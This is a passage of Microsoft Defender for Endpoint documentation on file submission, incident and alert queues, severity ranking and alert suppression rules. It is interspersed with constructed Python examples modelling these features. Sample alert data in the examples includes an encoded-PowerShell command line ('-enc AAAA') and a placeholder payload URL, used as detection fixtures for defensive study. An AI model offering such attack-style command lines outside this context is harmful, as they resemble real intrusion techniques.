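        raise ValueError(f"prefix {prefix!r} does not match a {digest_type} digest")
    return digest_type, text


def file_digests(data: bytes) -> dict:
    """Compute SHA-1 and SHA-256 of the sample bytes (what you would paste into the portal)."""
    return {
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def build_hash_submission(hash_value: str, category: str, note: str = "") -> dict:
    """Assemble a file-hash submission record after validating its fields."""
    if category not in CATEGORIES:
        raise ValueError(f"category must be one of {CATEGORIES}")
    digest_type, hex_digest = normalize_hash(hash_value)
    return {
        "submission_type": "File hash",
        "digest_type": digest_type,
        "hash": hex_digest,
        "category": category,
        "note": note,
    }


if __name__ == "__main__":
    sample = b"constructed sample content, not a real file"
    print(file_digests(sample))
    print(build_hash_submission(
        "2725EB73741E23A254404CC6B5A54D9511B9923BE2045056075542CA1BFBF3FE",
        "Clean (false positive)", note="known internal tool"))
```

The page's own example value normalizes to a SHA-256 digest; a value of any other length, or with a non-hex character copied from a report, is rejected before it reaches the portal.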

Report items to Microsoft from the Alerts page in the Defender portal

1. In the Microsoft Defender portal at https://security.microsoft.com, go to
Incidents & alerts > Alerts. Or, to go directly to the Alerts page, use
https://security.microsoft.com/alerts.

2. On the Alerts page, find the alert that contains the file you want to report. For
example, you can select Filter, and then select Service sources > Microsoft
Defender for Endpoint.

3. Select the alert from the list by clicking anywhere in the row other than the check
box next to the Alert name value.

4. In the details flyout that opens, select > Submit items to Microsoft for review.

5. The options that are available in the Submit items to Microsoft for review flyout
that opens are basically the same as described in the previous section.

The only difference is an Include alert story option that you can select to attach a
JSON file that helps Microsoft investigate the submission.

When you're finished in the Submit items to Microsoft for review flyout, select
Submit.

The submission is available on the Files tab of the Submissions page at
https://security.microsoft.com/reportsubmission?viewid=file.

Related information
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Microsoft Defender for Endpoint in Microsoft Defender XDR
Address false positives/negatives
View and organize alerts queue in Microsoft Defender for Endpoint



View and organize the Microsoft
Defender for Endpoint Incidents queue
Article • 01/24/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Tip

For a limited time during January 2024, when you visit the Incidents page,
Defender Boxed appears. Defender Boxed highlights your organization's security
successes, improvements, and response actions during 2023. To reopen Defender
Boxed, in the Microsoft Defender portal, go to Incidents, and then select Your
Defender Boxed.

The Incidents queue shows a collection of incidents that were flagged from devices in
your network. It helps you sort through incidents to prioritize them and make an informed
cybersecurity response decision.

By default, the queue displays incidents seen in the last 6 months, with the most recent
incident showing at the top of the list, helping you see the most recent incidents first.

There are several options you can choose from to customize the Incidents queue view.

On the top navigation you can:

Customize columns to add or remove columns
Modify the number of items to view per page
Select the items to show per page
Batch-select the incidents to assign
Navigate between pages
Apply filters
Customize and apply date ranges

Sort and filter the incidents queue

You can apply the following filters to limit the list of incidents and get a more focused
view.

Severity

Incident severity and description:

High (Red): Threats often associated with advanced persistent threats (APT). These incidents
indicate a high risk due to the severity of damage they can inflict on devices.

Medium (Orange): Threats rarely observed in the organization, such as anomalous registry
change, execution of suspicious files, and observed behaviors typical of attack stages.

Low (Yellow): Threats associated with prevalent malware and hack-tools that do not
necessarily indicate an advanced threat targeting the organization.

Informational (Grey): Informational incidents might not be considered harmful to the network
but might be good to keep track of.

Assigned to
You can choose to filter the list by selecting assigned to anyone or ones that are
assigned to you.

Category
Incidents are categorized by the stage of the cybersecurity kill chain they are in. This
view helps the threat analyst determine the priority, urgency, and corresponding response
strategy to deploy based on context.

Status
You can choose to limit the list of incidents shown based on their status to see which
ones are active or resolved.

Data sensitivity
Use this filter to show incidents that contain sensitivity labels.

Incident naming
To understand the incident's scope at a glance, incident names are automatically
generated based on alert attributes such as the number of endpoints affected, users
affected, detection sources or categories.

For example: Multi-stage incident on multiple endpoints reported by multiple sources.

Note

Incidents that existed prior to the rollout of automatic incident naming will retain their
name.

See also
Incidents queue
Manage incidents
Investigate incidents



Manage Microsoft Defender for
Endpoint incidents
Article • 01/24/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Managing incidents is an important part of every cybersecurity operation. You can
manage incidents by selecting an incident from the Incidents queue or the Incidents
management pane.

Tip

For a limited time during January 2024, when you visit the Incidents page,
Defender Boxed appears. Defender Boxed highlights your organization's security
successes, improvements, and response actions during 2023. To reopen Defender
Boxed, in the Microsoft Defender portal, go to Incidents, and then select Your
Defender Boxed.

Selecting an incident from the Incidents queue brings up the Incident management
pane where you can open the incident page for details.


You can assign incidents to yourself, change the status and classification, rename, or
comment on them to keep track of their progress.

Tip

For additional visibility at a glance, incident names are automatically generated
based on alert attributes such as the number of endpoints affected, users affected,
detection sources or categories. This allows you to quickly understand the scope of
the incident.

For example: Multi-stage incident on multiple endpoints reported by multiple sources.

Incidents that existed prior to the rollout of automatic incident naming will retain their
names.

Assign incidents
If an incident has not been assigned yet, you can select Assign to me to assign the
incident to yourself. Doing so assumes ownership of not just the incident, but also all
the alerts associated with it.

Set status and classification

Incident status
You can categorize incidents (as Active, or Resolved) by changing their status as your
investigation progresses. This helps you organize and manage how your team can
respond to incidents.

For example, your SOC analyst can review the urgent Active incidents for the day, and
decide to assign them to themselves for investigation.

Alternatively, your SOC analyst might set the incident as Resolved if the incident has
been remediated.

Classification
You can choose not to set a classification, or decide to specify whether an incident is a
true positive or a false positive. Doing so helps the team see patterns and learn from them.

Add comments
You can add comments and view historical events about an incident to see previous
changes made to it.

Whenever a change or comment is made to an alert, it is recorded in the Comments and
history section.

Added comments instantly appear on the pane.

Related topics
Incidents queue
View and organize the Incidents queue
Investigate incidents

Investigate incidents in Microsoft
Defender for Endpoint
Article • 01/24/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Investigate incidents that affect your network, understand what they mean, and collate
evidence to resolve them.

When you investigate an incident, you'll see:

Incident details
Incident comments and actions
Tabs (alerts, devices, investigations, evidence, graph)

https://www.microsoft.com/en-us/videoplayer/embed/RE4qLUV?postJsllMsg=true

Analyze incident details

Tip

For a limited time during January 2024, when you visit the Incidents page,
Defender Boxed appears. Defender Boxed highlights your organization's security
successes, improvements, and response actions during 2023. To reopen Defender
Boxed, in the Microsoft Defender portal, go to Incidents, and then select Your
Defender Boxed.

Click an incident to see the Incident pane. Select Open incident page to see the
incident details and related information (alerts, devices, investigations, evidence, graph).

Alerts
You can investigate the alerts and see how they were linked together in an incident.
Alerts are grouped into incidents based on the following reasons:

Automated investigation - The automated investigation triggered the linked alert
while investigating the original alert
File characteristics - The files associated with the alert have similar characteristics
Manual association - A user manually linked the alerts
Proximate time - The alerts were triggered on the same device within a certain
timeframe
Same file - The files associated with the alert are exactly the same
Same URL - The URL that triggered the alert is exactly the same
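To make the grouping reasons above concrete, here is a toy correlator that merges alerts into incidents by the mechanical reasons in the list (same file, same URL, proximate time on one device, and manual association). It is an added example written for this page, not Defender for Endpoint's correlation engine: the alert field names (`id`, `device`, `time`, `sha256`, `url`), the ten-minute proximity window and the sample alerts are all constructed for the example.

```python
"""Added example: a toy alert-to-incident correlator implementing the grouping
reasons listed above (same file, same URL, proximate time on the same device,
manual association). This is not Defender for Endpoint's correlation engine;
the alert field names, the 10-minute window and the sample alerts are
constructed for this example."""
from datetime import datetime, timedelta

# Constructed sample alerts (field names are this example's assumptions).
SAMPLE_ALERTS = [
    {"id": "a1", "device": "host01", "time": "2024-01-10T09:00:00", "sha256": "f1" * 32, "url": None},
    {"id": "a2", "device": "host01", "time": "2024-01-10T09:04:00", "sha256": None, "url": None},
    {"id": "a3", "device": "host02", "time": "2024-01-10T13:00:00", "sha256": "f1" * 32, "url": None},
    {"id": "a4", "device": "host03", "time": "2024-01-11T08:00:00", "sha256": None, "url": "http://example.test/payload"},
    {"id": "a5", "device": "host04", "time": "2024-01-12T08:00:00", "sha256": None, "url": "http://example.test/payload"},
    {"id": "a6", "device": "host05", "time": "2024-01-12T08:00:00", "sha256": None, "url": None},
]
# An analyst linked a6 to a2 by hand (constructed).
MANUAL_LINKS = [("a6", "a2")]


class DisjointSet:
    """Union-find: each alert starts alone; every link merges two groups."""
    def __init__(self, items):
        self.parent = {i: i for i in items}

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def correlate(alerts, manual_links=(), window=timedelta(minutes=10)):
    """Group alerts into incidents; return a list of {alerts, devices, reasons}."""
    groups = DisjointSet([a["id"] for a in alerts])
    link_reasons = []  # (alert_id, alert_id, reason)

    def link(a, b, reason):
        groups.union(a, b)
        link_reasons.append((a, b, reason))

    # Same file / same URL: bucket by the exact value, then link each bucket together.
    for key, reason in (("sha256", "Same file"), ("url", "Same URL")):
        buckets = {}
        for alert in alerts:
            if alert[key]:
                buckets.setdefault(alert[key], []).append(alert["id"])
        for ids in buckets.values():
            for other in ids[1:]:
                link(ids[0], other, reason)

    # Proximate time: consecutive alerts on the same device within the window.
    by_device = {}
    for alert in alerts:
        by_device.setdefault(alert["device"], []).append(alert)
    for device_alerts in by_device.values():
        ordered = sorted(device_alerts, key=lambda a: a["time"])
        for prev, cur in zip(ordered, ordered[1:]):
            gap = datetime.fromisoformat(cur["time"]) - datetime.fromisoformat(prev["time"])
            if gap <= window:
                link(prev["id"], cur["id"], "Proximate time")

    for a, b in manual_links:
        link(a, b, "Manual association")

    members = {}
    for alert in alerts:
        members.setdefault(groups.find(alert["id"]), []).append(alert)
    incidents = []
    for root, alerts_in in members.items():
        reasons = sorted({r for a, _, r in link_reasons if groups.find(a) == root})
        incidents.append({
            "alerts": sorted(a["id"] for a in alerts_in),
            "devices": sorted({a["device"] for a in alerts_in}),
            "reasons": reasons,
        })
    return sorted(incidents, key=lambda inc: inc["alerts"])


if __name__ == "__main__":
    for incident in correlate(SAMPLE_ALERTS, MANUAL_LINKS):
        print(incident)
```

With the sample data, a1 and a2 merge by proximate time, a3 joins them through the shared file hash, and the manual link pulls in a6, so one incident spans three devices; a4 and a5 form a second incident on the shared URL. Remove the manual link and a6 stands alone, which is the behaviour a reader should expect when the only tie between two alerts is an analyst's judgement.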


You can also manage an alert and see alert metadata along with other information. For
more information, see Investigate alerts.

Devices
You can also investigate the devices that are part of, or related to, a given incident. For
more information, see Investigate devices.

Investigations
Select Investigations to see all the automatic investigations launched by the system in
response to the incident alerts.

Going through the evidence

Microsoft Defender for Endpoint automatically investigates all the incidents' supported
events and suspicious entities in the alerts, providing you with autoresponse and
information about the important files, processes, services, and more.

Each of the analyzed entities will be marked as infected, remediated, or suspicious.

Visualizing associated cybersecurity threats

Microsoft Defender for Endpoint aggregates the threat information into an incident so
you can see the patterns and correlations coming in from various data points. You can
view such correlation through the incident graph.

Incident graph
The Graph tells the story of the cybersecurity attack. For example, it shows you the
entry point, and which indicator of compromise or activity was observed on which device.

You can click the circles on the incident graph to view the details of the malicious files,
their associated file detections, how many instances have been seen worldwide, and whether
the file has been observed in your organization and, if so, in how many instances.


Related topics
Incidents queue
Investigate incidents in Microsoft Defender for Endpoint
Manage Microsoft Defender for Endpoint incidents



Alerts queue in Microsoft Defender XDR
Article • 02/15/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Learn how you can view and manage the queue so that you can effectively investigate
threats seen on entities such as devices, files, or user accounts.

In this section

View and organize the Alerts queue: Shows a list of alerts that were flagged in your network.

Manage alerts: Learn how you can manage alerts, such as changing their status, assigning
them to a security operations member, and seeing the history of an alert.

Investigate alerts: Investigate alerts that are affecting your network, understand what they
mean, and how to resolve them.

Investigate files: Investigate the details of a file associated with a specific alert, behavior,
or event.

Investigate devices: Investigate the details of a device associated with a specific alert,
behavior, or event.

Investigate an IP address: Examine possible communication between devices in your network
and external internet protocol (IP) addresses.

Investigate a domain: Investigate a domain to see if devices and servers in your network have
been communicating with a known malicious domain.

Investigate a user account: Identify user accounts with the most active alerts and investigate
cases of potentially compromised credentials.



View and organize the Microsoft
Defender for Endpoint Alerts queue
Article • 02/15/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

The Alerts queue shows a list of alerts that were flagged from devices in your network.
By default, the queue displays alerts seen in the last 7 days in a grouped view. The most
recent alerts are shown at the top of the list helping you see the most recent alerts first.

Note

The alerts are significantly reduced with automated investigation and remediation,
allowing security operations experts to focus on more sophisticated threats and
other high value initiatives. When an alert contains a supported entity for
automated investigation (for example, a file) in a device that has a supported
operating system for it, an automated investigation and remediation can start. For
more information on automated investigations, see Overview of Automated
investigations.

There are several options you can choose from to customize the alerts view.

On the top navigation you can:

Customize columns to add or remove columns
Apply filters
Display the alerts for a particular duration like 1 Day, 3 Days, 1 Week, 30 Days, and
6 Months
Export the alerts list to Excel
Manage Alerts

Sort and filter alerts

You can apply the following filters to limit the list of alerts and get a more focused view
of the alerts.

Severity

Alert severity and description:

High (Red): Alerts commonly seen associated with advanced persistent threats (APT). These
alerts indicate a high risk because of the severity of damage they can inflict on
devices. Some examples are: credential theft tools activities, ransomware activities
not associated with any group, tampering with security sensors, or any malicious
activities indicative of a human adversary.

Medium (Orange): Alerts from endpoint detection and response post-breach behaviors that
might be a part of an advanced persistent threat (APT). These behaviors include
observed behaviors typical of attack stages, anomalous registry change, execution
of suspicious files, and so forth. Although some might be part of internal security
testing, it requires investigation as it might also be a part of an advanced attack.

Low (Yellow): Alerts on threats associated with prevalent malware. For example, hack-tools,
non-malware hack tools, such as running exploration commands, clearing logs,
etc., that often do not indicate an advanced threat targeting the organization. It
could also come from an isolated security tool testing by a user in your
organization.

Informational (Grey): Alerts that might not be considered harmful to the network but can
drive organizational security awareness on potential security issues.

Understanding alert severity

Microsoft Defender Antivirus and Defender for Endpoint alert severities are different
because they represent different scopes.

The Microsoft Defender Antivirus threat severity represents the absolute severity of the
detected threat (malware), and is assigned based on the potential risk to the individual
device, if infected.

The Defender for Endpoint alert severity represents the severity of the detected
behavior: the actual risk to the device but, more importantly, the potential risk to the
organization.

So, for example:

The severity of a Defender for Endpoint alert about a Microsoft Defender Antivirus
detected threat that was prevented and did not infect the device is categorized as
"Informational" because there was no actual damage.
An alert about commercial malware that was detected while executing, but blocked
and remediated by Microsoft Defender Antivirus, is categorized as "Low" because
it may have caused some damage to the individual device but poses no
organizational threat.
An alert about malware detected while executing that can pose a threat not only
to the individual device but to the organization, regardless of whether it was eventually
blocked, may be ranked as "Medium" or "High".
Suspicious behavioral alerts that weren't blocked or remediated will be ranked
"Low", "Medium" or "High" following the same organizational threat
considerations.
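The four worked cases above reduce to a small decision rule: a prevented antivirus detection is Informational, anything that executed is ranked by the organizational threat it poses, and whether it was eventually blocked does not lower that rank. The following Python is an added example, not Defender for Endpoint's scoring logic. The `detectionSource` values `WindowsDefenderAv` and `WindowsDefenderAtp` are the API values this article lists under Policy; the `outcome` and `org_threat` fields, the `triage_queue` helper and the sample alerts are constructed for the example.

```python
"""Added example: deriving an alert severity from the rules given above. This is
not Defender for Endpoint's scoring logic; the detectionSource values come from
the Policy table in this article, while the `outcome` and `org_threat` fields
and the sample alerts are constructed for the example."""

SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}

# Organizational threat level, as judged by the analyst or engine, mapped to severity.
ORG_THREAT_SEVERITY = {"none": "Low", "medium": "Medium", "high": "High"}


def alert_severity(alert):
    """Apply the article's worked examples as rules.

    detectionSource: "WindowsDefenderAv" (antivirus, a malware detection) or
                     "WindowsDefenderAtp" (EDR, a behavioral detection)
    outcome: "prevented" (never ran), "blocked" (ran, then blocked/remediated),
             "detected" (ran, not remediated)
    org_threat: "none" | "medium" | "high"
    """
    source, outcome, org = alert["detectionSource"], alert["outcome"], alert["org_threat"]
    if source == "WindowsDefenderAv":
        if outcome == "prevented":
            return "Informational"  # never infected the device: no actual damage
        # Executed malware: Low when it threatens only the device, Medium/High when it
        # threatens the organization, regardless of whether it was eventually blocked.
        # (Assumption of this example: unremediated commodity malware with no
        # organizational threat is also Low.)
        return ORG_THREAT_SEVERITY[org]
    if source == "WindowsDefenderAtp":
        if outcome == "prevented":
            raise ValueError("behavioral alerts describe behavior that already ran")
        return ORG_THREAT_SEVERITY[org]
    raise ValueError(f"no severity rule for detection source {source!r}")


def triage_queue(alerts):
    """Attach a severity to each alert and order the queue highest severity first."""
    scored = [dict(a, severity=alert_severity(a)) for a in alerts]
    return sorted(scored, key=lambda a: SEVERITY_RANK[a["severity"]], reverse=True)


# Constructed sample alerts mirroring the four cases in the text.
SAMPLE_ALERTS = [
    {"id": "av-1", "detectionSource": "WindowsDefenderAv", "outcome": "prevented",
     "org_threat": "none", "title": "Trojan dropper written to disk, quarantined before execution"},
    {"id": "av-2", "detectionSource": "WindowsDefenderAv", "outcome": "blocked",
     "org_threat": "none", "title": "Commodity adware executed, then remediated"},
    {"id": "av-3", "detectionSource": "WindowsDefenderAv", "outcome": "blocked",
     "org_threat": "high", "title": "Ransomware executed, then blocked"},
    {"id": "edr-1", "detectionSource": "WindowsDefenderAtp", "outcome": "detected",
     "org_threat": "medium", "title": "Anomalous registry change"},
    {"id": "edr-2", "detectionSource": "WindowsDefenderAtp", "outcome": "detected",
     "org_threat": "high", "title": "Credential theft tool activity"},
]


if __name__ == "__main__":
    for alert in triage_queue(SAMPLE_ALERTS):
        print(f'{alert["severity"]:<14} {alert["id"]:<6} {alert["title"]}')
```

Note that av-3 outranks av-2 even though both were blocked by antivirus: the organizational threat, not the block, drives the rank, which is the point the article is making.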

Status
You can choose to filter the list of alerts based on their Status.

Note

If you see an Unsupported alert type alert status, it means that automated
investigation capabilities cannot pick up that alert to run an automated
investigation. However, you can investigate these alerts manually.

Categories
We've redefined the alert categories to align to the enterprise attack tactics in the
MITRE ATT&CK matrix. New category names apply to all new alerts. Existing alerts will
keep the previous category names.

Service sources
You can filter the alerts based on the following Service sources:

Microsoft Defender for Identity
Microsoft Defender for Cloud Apps
Microsoft Defender for Endpoint
Microsoft Defender XDR
Microsoft Defender for Office 365
App Governance
Microsoft Entra ID Protection

Microsoft Endpoint Notification customers can now filter and see detections from the
service by filtering by Microsoft Defender Experts nested under the Microsoft Defender for
Endpoint service source.

Note

The Antivirus filter will only appear if devices are using Microsoft Defender Antivirus
as the default real-time protection antimalware product.

Tags
You can filter the alerts based on Tags assigned to alerts.

Policy
You can filter the alerts based on the following policies:

Detection source and API value:

Third-party sensors: ThirdPartySensors
Antivirus: WindowsDefenderAv
Automated investigation: AutomatedInvestigation
Custom detection: CustomDetection
Custom TI: CustomerTI
EDR: WindowsDefenderAtp
Microsoft Defender XDR: MTP
Microsoft Defender for Office 365: OfficeATP
Microsoft Defender Experts: ThreatExperts
SmartScreen: WindowsDefenderSmartScreen

Entities
You can filter the alerts based on Entity name or ID.

Automated investigation state

You can choose to filter the alerts based on their Automated investigation state.

Related topics
Manage Microsoft Defender for Endpoint alerts
Investigate Microsoft Defender for Endpoint alerts
Investigate a file associated with a Microsoft Defender for Endpoint alert
Investigate devices in the Microsoft Defender for Endpoint Devices list
Investigate an IP address associated with a Microsoft Defender for Endpoint alert
Investigate a domain associated with a Microsoft Defender for Endpoint alert
Investigate a user account in Microsoft Defender for Endpoint

Review alerts in Microsoft Defender for
Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

The alert page in Microsoft Defender for Endpoint provides full context to the alert, by
combining attack signals and alerts related to the selected alert, to construct a detailed
alert story.

Quickly triage, investigate, and take effective action on alerts that affect your
organization. Understand why they were triggered, and their impact from one location.
Learn more in this overview.
https://www.microsoft.com/en-us/videoplayer/embed/RE4yiO5?postJsllMsg=true

Getting started with an alert

Selecting an alert's name in Defender for Endpoint will land you on its alert page. On the
alert page, all the information will be shown in context of the selected alert. Each alert
page consists of four sections:

1. The alert title shows the alert's name and is there to remind you which alert
started your current investigation regardless of what you have selected on the
page.
2. Affected assets lists cards of devices and users affected by this alert that are
clickable for further information and actions.
3. The alert story displays all entities related to the alert, interconnected by a tree
view. The alert in the title will be the one in focus when you first land on your
selected alert's page. Entities in the alert story are expandable and clickable, to
provide additional information and expedite response by allowing you to take
actions right in the context of the alert page. Use the alert story to start your
investigation. Learn how in Investigate alerts in Microsoft Defender for Endpoint.
4. The details pane will show the details of the selected alert at first, with details and
actions related to this alert. If you select any of the affected assets or entities in the
alert story, the details pane will change to provide contextual information and
actions for the selected object.

Note the detection status for your alert.

Prevented: The attempted suspicious action was avoided. For example, a file either
wasn't written to disk or executed.

Blocked: Suspicious behavior was executed and then blocked. For example, a
process was executed but because it subsequently exhibited suspicious behaviors,
the process was terminated.

Detected: An attack was detected and is possibly still active.


You can then also review the automated investigation details in your alert's details pane,
to see which actions were already taken, as well as reading the alert's description for
recommended actions.

Other information available in the details pane when the alert opens includes MITRE
techniques, source, and additional contextual details.

Note
If you see an Unsupported alert type alert status, it means that automated
investigation capabilities cannot pick up that alert to run an automated
investigation. However, you can investigate these alerts manually.

Review affected assets

Selecting a device or a user card in the affected assets sections will switch to the details
of the device or user in the details pane.

For devices, the details pane will display information about the device itself, like
Domain, Operating System, and IP. Active alerts and the logged on users on that
device are also available. You can take immediate action by isolating the device,
restricting app execution, or running an antivirus scan. Alternatively, you could
collect an investigation package, initiate an automated investigation, or go to the
device page to investigate from the device's point of view.

For users, the details pane will display detailed user information, such as the user's
SAM name and SID, as well as logon types performed by this user and any alerts
and incidents related to it. You can select Open user page to continue the
investigation from that user's point of view.

Related topics
View and organize the incidents queue
Investigate incidents
Manage incidents



Manage Microsoft Defender for
Endpoint alerts
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint notifies you of possible malicious events, attributes, and
contextual information through alerts. A summary of new alerts is displayed and you can
access all alerts in the Alerts queue.

You can manage alerts by selecting an alert in the Alerts queue, or the Alerts tab of the
Device page for an individual device.

Selecting an alert in either of those places brings up the Alert management pane.

Watch this video to learn how to use the new Microsoft Defender for Endpoint alert
page.
https://www.microsoft.com/en-us/videoplayer/embed/RE4yiO5?postJsllMsg=true

Link to another incident

You can create a new incident from the alert or link to an existing incident.

Assign alerts
If an alert is not yet assigned, you can select Assign to me to assign the alert to yourself.

Suppress alerts
There might be scenarios where you need to suppress alerts from appearing in
Microsoft Defender XDR. Defender for Endpoint lets you create suppression rules for
specific alerts that are known to be innocuous such as known tools or processes in your
organization.

Suppression rules can be created from an existing alert. They can be disabled and
reenabled if needed.

When a suppression rule is created, it will take effect from the point when the rule is
created. The rule will not affect existing alerts already in the queue, prior to the rule
creation. The rule will only be applied on alerts that satisfy the conditions set after the
rule is created.

There are two contexts for a suppression rule that you can choose from:

Suppress alert on this device
Suppress alert in my organization

The context of the rule lets you tailor what gets surfaced into the portal and ensure that
only real security alerts are surfaced into the portal.

You can use the examples in the following table to help you choose the context for a
suppression rule:

Context: Suppress alert on this device
Definition: Alerts with the same alert title and on that specific device only will be
suppressed. All other alerts on that device will not be suppressed.
Example scenarios: A security researcher is investigating a malicious script that has
been used to attack other devices in your organization. A developer regularly creates
PowerShell scripts for their team.

Context: Suppress alert in my organization
Definition: Alerts with the same alert title on any device will be suppressed.
Example scenarios: A benign administrative tool is used by everyone in your
organization.

Suppress an alert and create a new suppression rule

Create custom rules to control when alerts are suppressed, or resolved. You can control
the context for when an alert is suppressed by specifying the alert title, Indicator of
compromise, and the conditions. After specifying the context, you'll be able to configure
the action and scope on the alert.

1. Select the alert you'd like to suppress. This brings up the Alert management pane.

2. Select Create a suppression rule.

You can create a suppression condition using these attributes. An AND operator is
applied between each condition, so suppression occurs only if all conditions are
met.

File SHA1
File name - wildcard supported
Folder path - wildcard supported
IP address
URL - wildcard supported
Command line - wildcard supported

3. Select the Triggering IOC.

4. Specify the action and scope on the alert.

You can automatically resolve an alert or hide it from the portal. Alerts that are
automatically resolved will appear in the resolved section of the alerts queue, alert
page, and device timeline and will appear as resolved across Defender for Endpoint
APIs.

Alerts that are marked as hidden will be suppressed from the entire system, both
on the device's associated alerts and from the dashboard and will not be streamed
across Defender for Endpoint APIs.

5. Enter a rule name and a comment.

6. Click Save.

View the list of suppression rules

1. In the navigation pane, select Settings > Endpoints > Rules > Alert suppression.

2. The list of suppression rules shows all the rules that users in your organization
have created.

For more information on managing suppression rules, see Manage suppression rules.
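The rule semantics in the procedure above (conditions ANDed, wildcards only on file name, folder path, URL and command line, exact match on file SHA1 and IP address, a device or organization scope, a resolve or hide action, and no effect on alerts raised before the rule existed), modelled in Python as an added example rather than the product's own code. The Alert and SuppressionRule classes, their field names, the sample alerts and the SHA1 value are constructed for illustration.

```python
# Added example: a model of Defender for Endpoint alert suppression rules.
# Field names, sample alerts and the SHA1 value are constructed, not product data.
from dataclasses import dataclass
from datetime import datetime, timedelta
from fnmatch import fnmatchcase
from typing import Dict, List, Optional, Tuple

# Attributes the docs list as "wildcard supported" versus matched exactly.
WILDCARD_ATTRS = {"file_name", "folder_path", "url", "command_line"}
EXACT_ATTRS = {"file_sha1", "ip_address"}


@dataclass
class Alert:
    title: str
    device_id: str
    timestamp: datetime
    evidence: Dict[str, str]   # attribute -> observed value
    status: str = "New"        # New / In Progress / Resolved
    hidden: bool = False       # suppressed from portal and APIs


@dataclass
class SuppressionRule:
    title: str                  # only alerts with this title are considered
    conditions: Dict[str, str]  # attribute -> value or wildcard pattern (ANDed)
    scope: str                  # "device" or "organization"
    action: str                 # "resolve" or "hide"
    created: datetime           # rule affects only alerts raised after this
    device_id: Optional[str] = None  # required when scope == "device"
    enabled: bool = True        # rules can be disabled and re-enabled


def condition_matches(attr: str, pattern: str, value: Optional[str]) -> bool:
    """Match one condition; wildcards only where the docs allow them."""
    if value is None:
        return False
    if attr in WILDCARD_ATTRS:
        return fnmatchcase(value.lower(), pattern.lower())
    if attr in EXACT_ATTRS:
        return value.lower() == pattern.lower()
    raise ValueError(f"unsupported suppression attribute: {attr}")


def rule_matches(rule: SuppressionRule, alert: Alert) -> bool:
    """All conditions must match (AND), within the rule's scope and time."""
    if not rule.enabled or alert.title != rule.title:
        return False
    if alert.timestamp <= rule.created:      # pre-existing alerts are untouched
        return False
    if rule.scope == "device" and alert.device_id != rule.device_id:
        return False
    return all(condition_matches(attr, pat, alert.evidence.get(attr))
               for attr, pat in rule.conditions.items())


def apply_rules(rules: List[SuppressionRule], alerts: List[Alert]) -> List[Alert]:
    """Apply the first matching rule to each alert; return what the portal shows.
    'resolve' keeps the alert visible (marked Resolved); 'hide' drops it."""
    visible = []
    for alert in alerts:
        for rule in rules:
            if rule_matches(rule, alert):
                if rule.action == "resolve":
                    alert.status = "Resolved"
                elif rule.action == "hide":
                    alert.hidden = True
                break
        if not alert.hidden:
            visible.append(alert)
    return visible


def demo() -> List[Tuple[str, str, bool]]:
    """Run constructed alerts through two rules; returns (device, status, hidden)."""
    now = datetime(2024, 2, 1, 12, 0, 0)
    build_cmd = "powershell.exe -File C:\\BuildScripts\\deploy.ps1"
    sha1 = "0123456789abcdef0123456789abcdef01234567"   # constructed value
    rules = [
        # A developer's build scripts trigger alerts on DEV-A only: auto-resolve there.
        SuppressionRule("Suspicious PowerShell command line",
                        {"file_name": "powershell.exe",
                         "command_line": "*\\BuildScripts\\*.ps1"},
                        "device", "resolve", now - timedelta(days=1), device_id="DEV-A"),
        # A benign admin tool used organization-wide: hide it everywhere.
        SuppressionRule("Suspicious use of administrative tool",
                        {"file_sha1": sha1.upper(), "folder_path": "C:\\Tools\\*"},
                        "organization", "hide", now - timedelta(days=1)),
    ]
    ps_title = "Suspicious PowerShell command line"
    ps_ev = {"file_name": "powershell.exe", "command_line": build_cmd}
    alerts = [
        Alert(ps_title, "DEV-A", now, ps_ev),                       # matches device rule
        Alert(ps_title, "DEV-B", now, ps_ev),                       # other device: untouched
        Alert(ps_title, "DEV-A", now, {"file_name": "powershell.exe",
                                       "command_line": "powershell.exe -enc AAAA"}),
        Alert(ps_title, "DEV-A", now - timedelta(days=2), ps_ev),   # predates the rule
        Alert("Suspicious use of administrative tool", "DEV-C", now,
              {"file_sha1": sha1, "folder_path": "C:\\Tools\\admin.exe"}),  # hidden
    ]
    apply_rules(rules, alerts)
    return [(a.device_id, a.status, a.hidden) for a in alerts]
```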

Change the status of an alert

You can categorize alerts (as New, In Progress, or Resolved) by changing their status as
your investigation progresses. This helps you organize and manage how your team can
respond to alerts.

For example, a team leader can review all New alerts, and decide to assign them to the
In Progress queue for further analysis.

Alternatively, the team leader might assign the alert to the Resolved queue if they know
the alert is benign, coming from a device that is irrelevant (such as one belonging to a
security administrator), or is being dealt with through an earlier alert.

Alert classification
You can choose not to set a classification, or specify whether an alert is a true alert or a
false alert. It's important to provide the classification of true positive/false positive. This
classification is used to monitor alert quality, and make alerts more accurate. The
"determination" field defines additional fidelity for a "true positive" classification.


Add comments and view the history of an alert

You can add comments and view historical events about an alert to see previous
changes made to the alert.

Whenever a change or comment is made to an alert, it is recorded in the Comments
and history section.

Added comments instantly appear on the pane.


Related articles
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Manage suppression rules
View and organize the Microsoft Defender for Endpoint Alerts queue
Investigate Microsoft Defender for Endpoint alerts
Investigate a file associated with a Microsoft Defender for Endpoint alert
